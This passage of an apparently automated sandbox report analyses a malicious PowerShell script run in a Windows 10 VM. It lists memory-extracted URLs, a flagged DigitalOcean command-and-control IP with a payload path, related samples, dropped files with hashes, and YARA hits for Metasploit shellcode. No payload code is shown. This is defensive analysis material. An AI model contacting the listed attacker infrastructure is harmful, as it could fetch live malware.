http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmp	false		high
https://go.micro	powershell.exe, 00000000.00000002.767490494.000001CDA1709000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone	WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone	WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince	WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	false		high
http://crl.osofts/Microt0	powershell.exe, 00000000.00000002.772612102.000001CDB8137000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20	WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/	WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication	WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	false		high
http://crl.m	WerFault.exe, 0000000D.00000002.762935904.0000000004CE4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o	WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid	WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o	WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	false		high
https://contoso.com/	powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/	WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.754811598.000001CD9FC11000.00000004.00000001.sdmp, powershell.exe, 00000005.00000000.710315225.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
206.189.69.35	unknown	United States		14061	DIGITALOCEAN-ASNUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	444594
Start date:	06.07.2021
Start time:	11:58:16
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	a.ps1
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.evad.winPS1@9/14@0/2
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 15 Number of non-executed functions: 5
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .ps1
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.43.193.48, 23.211.6.115, 168.61.161.212, 52.255.188.83, 20.82.210.154, 20.54.7.98, 40.112.88.60, 20.54.104.15, 13.64.90.137, 80.67.82.235, 80.67.82.211 Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, skypedataprdcolcus17.cloudapp.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net Execution Graph export aborted for target WerFault.exe, PID 6244 because there are no executed function Execution Graph export aborted for target powershell.exe, PID 7144 because it is empty Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:58:59	API Interceptor	317x Sleep call for process: powershell.exe modified
11:59:55	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
206.189.69.35	borabora_metallu.hta	Get hash	malicious	Browse	206.189.69.35/RyNC
	http://squirreldirectory.com	Get hash	malicious	Browse	squirreldirectory.com/
	borabora_metallu.hta	Get hash	malicious	Browse	206.189.69.35/RyNC
	1_borabora_metallurgy-invite.pdf.hta	Get hash	malicious	Browse	206.189.69.35/RyNC
	http://squirreldirectory.com	Get hash	malicious	Browse	squirreldirectory.com/
	borabora_metallu.hta	Get hash	malicious	Browse	206.189.69.35/RyNC
	1_borabora_metallurgy-invite.pdf.hta	Get hash	malicious	Browse	206.189.69.35/RyNC

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DIGITALOCEAN-ASNUS	borabora_metallu.hta	Get hash	malicious	Browse	206.189.69.35
	4z5jQqNiJl.exe	Get hash	malicious	Browse	138.197.133.25
	rixXmiPteY.exe	Get hash	malicious	Browse	178.62.84.251
	ibj3mCisBP.exe	Get hash	malicious	Browse	159.65.63.164
	ransom.exe	Get hash	malicious	Browse	157.245.5.40
	aiwXQo9A8t.exe	Get hash	malicious	Browse	159.65.63.164
	6SgOmhR0W6.exe	Get hash	malicious	Browse	178.62.84.251
	mJSDCeNxFi.exe	Get hash	malicious	Browse	159.65.63.164
	PjYJs5tjzw.exe	Get hash	malicious	Browse	178.62.84.251
	iew852qEQI.exe	Get hash	malicious	Browse	159.65.63.164
	eOKc6P237n.exe	Get hash	malicious	Browse	159.65.63.164
	V5PUg1V7w4.exe	Get hash	malicious	Browse	159.65.63.164
	DoQoP1LAjJ.exe	Get hash	malicious	Browse	159.65.63.164
	aJuAJI2NA7.exe	Get hash	malicious	Browse	159.65.63.164
	117AE3B6D9239584DA7887DB5DAEE6C240E9E58D2B4F6.exe	Get hash	malicious	Browse	46.101.22.196
	QNnyDhp4yu.exe	Get hash	malicious	Browse	178.62.84.251
	Ty8t38Pj1q.exe	Get hash	malicious	Browse	159.65.63.164
	l0kjr5QGep.exe	Get hash	malicious	Browse	178.62.84.251
	4i5dk53TQ0.exe	Get hash	malicious	Browse	178.62.84.251
	Gx91xlV6w5.exe	Get hash	malicious	Browse	159.65.63.164

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_powershell.exe_6b2b176963afc5a4d396f790df7833639527b4_a0584050_1976897e\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	7438
Entropy (8bit):	3.742414136112791
Encrypted:	false
SSDEEP:	192:FuphgZkZ6HKUgO+SQF/u7s5/S274ItwWA:SGZASKUgO+SQF/u7sxX4Itwd
MD5:	F678FB3947FAF0C51074A6E304216C21
SHA1:	7EA61B709EB34EDC69B0BF6C5757A048DFF7A527
SHA-256:	ECE2756A9F23A09B1B17C6C87CE22A7C850D99FE1FFAC5F8F8718E89B972864D
SHA-512:	FA04449FA4DBF5E2DF156B9EB3A627152265BBA7417B200663AD01D424131FA1FA78538C76A97CA27CE67344ECF07AE766E6DEC79854CBAA4B4E009822613BE0
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.0.0.3.9.1.7.7.8.4.2.5.5.3.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.0.0.3.9.1.9.3.9.4.2.5.5.3.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.5.6.6.5.2.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.2.e.2.7.f.5.2.-.e.a.8.5.-.4.8.f.8.-.b.9.b.8.-.5.9.2.f.7.0.8.e.8.d.b.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.3.2.a.6.b.8.7.-.b.a.9.6.-.4.4.a.3.-.a.7.8.0.-.f.4.3.b.2.7.9.3.9.4.e.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.4.c.-.0.0.0.1.-.0.0.1.b.-.e.2.6.2.-.2.f.8.c.4.d.7.2.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.6.6.a.5.9.2.d.2.3.0.6.7.c.6.e.f.f.1.5.3.5.6.f.8.7.4.e.5.b.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4735.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Jul 6 09:59:44 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	555843
Entropy (8bit):	3.8018845515864856
Encrypted:	false
SSDEEP:	6144:4uZiBCZrXCjBUCo2OR0IAp6NKJP8s+9RpD2Q7cXXDTj74AmzLEs:fZiBChCjBUmOK1JP8XPM3nQ
MD5:	5C6DD284981ED52F41E6E6CB5715857E
SHA1:	1DEF52C702D1D0445E19686EF743FD2DFB3A17F9
SHA-256:	D100DB2165AC7EACEA756DACF52BCFD4644F2374B9B41716B43AA3FAEAC1B473
SHA-512:	10F63CCA1EBF0A90567D500E41B73E94225EB74EC0F58FFD1B523C3B64483E750B2BA92C57EBE162C8730C3624F0331DD0E3D902607E8CAC42AD40C391E1C18A
Malicious:	false
Reputation:	low
Preview:	MDMP....... ........).`...................U...........B.......,......GenuineIntelW...........T.......L...f).`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B78.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.703483999789423
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNipS16x7r6Yu/SU9gEvhgmfMshS7a+prB89bE+sfjhMm:RrlsNipY6tr6YWSU2EvhgmfMshS7IE9T
MD5:	F208E6DF303A275640783D3D205A627A
SHA1:	E19BECDAEDED89B4C74DAA6A90BC23BAB2C83CC8
SHA-256:	C69C57C12B9C233F6432832C3410CCDB2FB24F24DE3F6752C07E26705944266D
SHA-512:	95A240094B9A46EA91A3E96CDB5F7ACAA12640846A81319C5080ED3D14E09EE24BECD925B1771F82C2BEF48B38C4110C59B500D67520D04E6421C3D3191372A8
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.6.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER706A.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4682
Entropy (8bit):	4.49999956896941
Encrypted:	false
SSDEEP:	48:cvIwSD8zs2JgtWI9kKWSC8Bab8fm8M4JQguZFIX+q8ryUWZDAWDEd:uITfMLrSNUYJQ/g7UWZDAWDEd
MD5:	8EF88A182B013EA07352679B4C3337AE
SHA1:	5C65070C876A6BDF068AC45400EB327D0EF5F2B1
SHA-256:	FEC0F905978DEAF7D29D11CEA090065E4DE38F78164213B3B2BF1EE10580349A
SHA-512:	BE94F1A7276558808D57056434B0583122005D020DEE5760E91CE8446CD02B6690F107A3A46B673A57E01996BA5BC8D857E5F9AE710BA63002BDDC912A720D08
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1065310" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	10014
Entropy (8bit):	4.955682419308819
Encrypted:	false
SSDEEP:	192:o3YrKkw9smn3YrKkhVsm5emlz9smyib4T4YVsm5emlYxoeRKp54ib4GxoeRH45IR:bMib4T4Yriib4wvUp3akjh4iUxB
MD5:	E9E08324148E2F9328FCD45C476FA4E6
SHA1:	1DDB3A5E5C5618A70DD7DD529AA0A1E731C7A152
SHA-256:	843B018FA7E2460179017164541E1CDF4EA7AF2E267A9CDA08824CA699DDBD64
SHA-512:	AE5549BFB0476855841DF3FB708A2FA73B3784ECBDADB745C82F0D6949DC94D3E4CCBECB9222DF8C1B5A93ECF0034774B8505613404AA0D8792B917C4FFA8EBF
Malicious:	false
Reputation:	low
Preview:	PSMODULECACHE......3......[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider........7B\.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-P

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2008
Entropy (8bit):	5.488118858521198
Encrypted:	false
SSDEEP:	48:DPerB4nqRL/HvFe9t4Cv94DS2ZZOX7tKa99mjlo6B5ieuN/:CrqnObHNev94DS2ZZOXg+9WlpB5FI
MD5:	D193722D6F5E20FAACB08252787BF20F
SHA1:	7644177FB743E7B088010C8CB793B600FA83F835
SHA-256:	ADBA58CE69A7899BF3BF55CD19BE8F26DA5D28E26F5E1C5C16D86799BA993AE3
SHA-512:	E488A3F37957311C31ED393F3DF7A92BF8A0CB20D7828C7DD9B6AC7DBFD0027D5DB22AE407706906B17A4FB7F627ED2822924E6D5A0B2C17F521A2A810E773D9
Malicious:	false
Preview:	@...e...............$................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_knqrf5jg.up2.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odvubcus.q0n.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_okb1lnuv.0pb.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0pfkn5d.g4h.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6UMHR4BIAXRCQBKOASP2.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6205
Entropy (8bit):	3.7553134246319124
Encrypted:	false
SSDEEP:	96:k2He9mScw60CO+S/qMkvhkvCCtLaNUHUaNUHc:ne9mSMPILqC
MD5:	53C9A9726AF4BA8E97E51D0245CC23B0
SHA1:	9493F8A3E14AF66CDB29D9557B705C636D58AC30
SHA-256:	AAB3BD7CF8033FEEFE5EAF2A47E58E2E89656B45CA06E1245B504E7B3C10F120
SHA-512:	D160B13903260E2C347605363C3B5F674BBD832F8248FBE689C8370F8FE2F925AEB378607981EE2227AA32E0CE99E5221FD84033F3163840B9FF1DC291591A75
Malicious:	false
Preview:	...................................FL..................F.".. ....J...-...rt^.`..\.................................:..DG..Yr?.D..U..k0.&...&...........-..HF.R....q>.Mr......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N...RWO.....Y....................yN\|.A.p.p.D.a.t.a...B.V.1......N....Roaming.@.......N...RWO.....Y.....................K..R.o.a.m.i.n.g.....\.1.....>Q.;..MICROS~1..D.......N...RWO.....Y.....................sJ.M.i.c.r.o.s.o.f.t.....V.1.....>Qz<..Windows.@.......N..>Qz<.....Y.....................uF.W.i.n.d.o.w.s.......1......N....STARTM~1..n.......N..>Q.;.....Y..............D.....6...S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.S..Programs..j.......N..>Q.;.....Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......N..>QZ7.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......N...P3Q.....Y..........

C:\Users\user\Documents\20210706\PowerShell_transcript.745773.5jmTZWs1.20210706115859.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2717
Entropy (8bit):	5.256480306133305
Encrypted:	false
SSDEEP:	48:BZrvjBoORzPAqDYB1Zb9rZXYvjBoORzPAqDYB1ZFKvT00xgZZoq:BZrjBNuqDo1ZRrZwjBNuqDo1ZYvRgZmq
MD5:	BFDC43FF3E2566380BC7E56F2690299F
SHA1:	46A392DCF0D5EE0AB82D7351F7DEC609CE969DCA
SHA-256:	510445BC05D528DEF3AF12B041DBB7FC78179B572C2EA48EBB82884681FC6BE1
SHA-512:	C0EB98D8734A51B713713D1A043C69EE0F04C5B8E501F89E5125C782E90468B8B107039125CBF3D7D54C475B3BE2110E592FA1C13D27672C731FE02851D75116
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210706115859..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 745773 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noLogo -ExecutionPolicy unrestricted -file C:\Users\user\Desktop\a.ps1..Process ID: 7144..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210706115859..******************..PS>CommandInvocation(a.ps1): "a.ps1"..********************..Windows PowerShell transcript start..Start time: 20210706142346..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 745773 (Microso

C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	4121
Entropy (8bit):	5.923810773642935
Encrypted:	false
SSDEEP:	96:BZQjBNPqDo1Zxjwg5SvvvOmVeLU1aGlmld3i6w7UFCkO0lgMk0lZ:cIvOPLU1FU3isbZZP
MD5:	AD47288331D1AFE2F0C95F45DE69DA10
SHA1:	59E25B67C687D29585DD2DDBC6DBD4855F072A1D
SHA-256:	4A11940E78E40D9E9895AD3C73FBDE0BBC8F56EBC792A23DFDC87D2DBBEB1DA2
SHA-512:	ED2BD66B0A8D385FE465836BFBE2CD2A907B06E0EE717DC027797F3CFB04BEB3C3A27D46C32B6F13B6C78965EDA13CE051DCBC50AA5296A5FD7A885C66DCBC44
Malicious:	true
Yara Hits:	Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt, Author: Florian Roth Rule: Base64_PS1_Shellcode, Description: Detects Base64 encoded PS1 Shellcode, Source: C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt, Author: Nick Carr, David Ledbetter Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt, Author: Joe Security
